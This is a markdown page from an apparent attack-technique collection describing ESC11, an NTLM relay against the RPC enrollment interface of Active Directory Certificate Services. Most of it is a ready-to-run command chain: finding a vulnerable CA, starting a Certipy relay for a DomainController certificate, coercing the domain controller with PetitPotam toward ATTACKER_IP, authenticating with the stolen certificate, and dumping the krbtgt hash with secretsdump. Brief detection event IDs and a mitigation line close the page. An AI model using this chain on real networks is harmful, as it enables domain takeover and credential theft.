attack-34-esc11-ntlm-relay-to-adcs-rpc.md (3391B)
1 --- 2 title: "Attack #34 โ ESC11 NTLM Relay to ADCS RPC" 3 description: "ESC11 is similar to ESC8 but targets the CA's RPC enrollment interface (MS-ICPR) instead of the HTTP web enrollment. If the CA does not enforce packetโฆ" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "adcs", "credential-access", "ntlm", "relay"] 7 tools: ["Impacket", "Certipy"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/๐ข Attack #34 โ ESC11 NTLM Relay to ADCS RPC.md" 11 --- 12 # ๐ข Attack #34 โ ESC11: NTLM Relay to ADCS RPC 13 14 *** 15 16 ## ๐ How It Works 17 18 ESC11 is similar to ESC8 but targets the CA's **RPC enrollment interface (MS-ICPR)** instead of the HTTP web enrollment. If the CA does not enforce packet privacy (the `IF_ENFORCEENCRYPTICERTREQUEST` flag is disabled), an attacker can relay NTLM authentication to the RPC interface to request certificates โ even when HTTP web enrollment is disabled or protected by EPA. 19 20 *** 21 22 ## โ๏ธ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **IF_ENFORCEENCRYPTICERTREQUEST disabled** | CA RPC interface doesn't require signing/encryption | 27 | **Coercion capability** | PetitPotam, PrinterBug, etc. | 28 | **Network access to CA RPC** | TCP 135 + dynamic RPC ports | 29 30 *** 31 32 ## ๐ป Full Commands 33 34 ### ๐ต Check If Vulnerable 35 36 ```bash 37 # โโ Certipy โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 38 certipy find -u low_user@corp.local -p 'Password1' -dc-ip 10.10.10.10 -vulnerable -stdout 39 # Look for: ESC11 โ IF_ENFORCEENCRYPTICERTREQUEST is disabled 40 ``` 41 42 ### ๐ด Exploit ESC11 43 44 ```bash 45 # โโ Step 1: Start Certipy relay targeting RPC โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 46 certipy relay -ca CA01.corp.local -template DomainController 47 48 # โโ Step 2: Coerce DC โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 49 python3 PetitPotam.py ATTACKER_IP DC01.corp.local 50 51 # โโ Step 3: Authenticate with resulting certificate โโโโโโโโโโโโโโโโโโโโโโโโโโ 52 certipy auth -pfx dc01.pfx -dc-ip 10.10.10.10 53 54 # โโ Step 4: DCSync โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 55 secretsdump.py corp.local/'DC01$'@DC01.corp.local -hashes :<HASH> -just-dc-user krbtgt 56 ``` 57 58 *** 59 60 ## ๐ก๏ธ Detection โ Event IDs 61 62 | Event ID | Source | What to Look For | 63 |---|---|---| 64 | **4886** | Security Log (CA) | Certificate enrollment via RPC from unexpected source | 65 | **4768** | Security Log (DC) | PKINIT TGT using DC certificate | 66 67 *** 68 69 ## ๐ Attack Chain Context 70 71 ``` 72 [ESC11] โโโ NTLM Relay to CA RPC โ same result as ESC8 73 โ 74 โโโโ ๐ Alternative to ESC8 when HTTP enrollment is disabled/protected 75 โโโโ ๐ฅ Same outcome: DC cert โ DCSync โ domain compromise 76 โโโโ ๐ Defeated by: enable IF_ENFORCEENCRYPTICERTREQUEST, disable NTLM 77 ``` 78 79 *** 80 81 > โ **Attack #34 โ ESC11 complete.**